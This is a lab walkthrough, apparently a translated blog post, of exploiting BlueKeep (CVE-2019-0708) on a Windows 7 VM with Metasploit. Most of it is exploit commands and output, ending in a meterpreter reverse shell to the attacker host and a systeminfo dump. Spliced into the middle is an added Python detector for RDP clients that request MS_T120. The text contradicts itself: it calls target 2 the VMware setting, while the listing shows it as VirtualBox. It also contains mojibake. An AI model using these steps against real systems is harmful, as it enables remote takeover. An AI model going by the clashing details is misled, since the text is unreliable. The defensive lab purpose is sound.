1. Attacker IP: 192.168.1.10
System: Kali 2022 (VMware 16.0)
2. Target IP: 192.168.1.8
System: Windows 7 6.1.7601 Service Pack 1 Build 7601
Remote Assistance / RDP enabled, listening on port 3389
Exploiting CVE-2019-0708 (BlueKeep) against Windows 7 from Kali
1. Open Kali, start msfconsole and search for cve_2019_0708; the module found is:
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
2. Select the module exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
3. List the available targets
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets (list targets)
Exploit targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
4. Review the module options
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > options (view configuration)
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 192.168.1.8 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3389 yes The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic targeting via fingerprinting
5. Run the module
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run (start the exploit)
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.8:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.8:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.1.8:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.8:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.8:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.1.8:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !
[*] Exploit completed, but no session was created.
Try again, this time setting the target manually as the error message asks (the VM runs under VMware, and target 2 is the one that worked here):
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.8:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.8:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.1.8:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.8:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.8:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.8:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[!] 192.168.1.8:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.8:3389 - Surfing channels ...
[*] 192.168.1.8:3389 - Lobbing eggs ...
[*] 192.168.1.8:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.1.8:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200262 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.8:49214 ) at 2022-10-01 05:04:38 -0400
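The automatic check above reports the host as vulnerable because it accepts, and then tries to clean up, a client-requested binding of the MS_T120 static virtual channel, a channel the server binds by itself and no legitimate client asks for. The same property is usable from the defender's side: the added Python below (not part of the original write-up or of Metasploit) walks the GCC user-data blocks of an RDP client's connect request, as laid out in MS-RDPBCGR (TS_UD_CS_NET block type 0xC003, channelCount, then 12-byte CHANNEL_DEF entries with an 8-byte name), and flags any client that names MS_T120. The sample bytes, including the shortened stand-in CS_CORE block, are constructed here for the demonstration.

```python
import struct

# Constants from MS-RDPBCGR: the TS_UD_CS_NET user-data block type and the
# name of the static virtual channel the server normally binds on its own.
CS_NET = 0xC003
SUSPICIOUS_CHANNEL = b"MS_T120"


def parse_user_data_blocks(data: bytes):
    """Yield (type, payload) for each TS_UD block: 2-byte type, 2-byte total length, LE."""
    off = 0
    while off + 4 <= len(data):
        btype, blen = struct.unpack_from("<HH", data, off)
        if blen < 4 or off + blen > len(data):
            break  # malformed or truncated block: stop rather than misparse
        yield btype, data[off + 4:off + blen]
        off += blen


def client_channel_names(data: bytes):
    """Return the channel names the client requests in its CS_NET block (empty if none)."""
    for btype, payload in parse_user_data_blocks(data):
        if btype != CS_NET or len(payload) < 4:
            continue
        (count,) = struct.unpack_from("<I", payload, 0)
        names = []
        for i in range(count):
            start = 4 + 12 * i
            if start + 12 > len(payload):
                break  # channelCount claims more entries than are present
            names.append(payload[start:start + 8].rstrip(b"\x00"))
        return names
    return []


def requests_ms_t120(data: bytes) -> bool:
    """True when the client tries to bind MS_T120 itself; treat such a connect as an alert."""
    return any(n.upper() == SUSPICIOUS_CHANNEL for n in client_channel_names(data))


def build_cs_net(names):
    """Constructed helper: encode a CS_NET block for the sample data below."""
    defs = b"".join(struct.pack("<8sI", n, 0) for n in names)
    return struct.pack("<HHI", CS_NET, 8 + len(defs), len(names)) + defs


# Constructed samples: a shortened stand-in CS_CORE block (type 0xC001) followed by CS_NET.
STUB_CORE = struct.pack("<HH", 0xC001, 8) + b"\x00" * 4
BENIGN = STUB_CORE + build_cs_net([b"rdpdr", b"cliprdr"])
SUSPECT = STUB_CORE + build_cs_net([b"rdpdr", b"MS_T120", b"cliprdr"])
```

A truncated CS_NET block is dropped rather than partially parsed, so a cut-off capture yields no channel names instead of a false negative that looks like a clean result.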
6. A shell is obtained
meterpreter > shell
Process 4452 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
7. Check the target host information
C:\Windows\system32>systeminfo
systeminfo
主机名: USER-20191228PM
OS 名称: Microsoft Windows 7 �?��
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: ��������?
8. The exercise is complete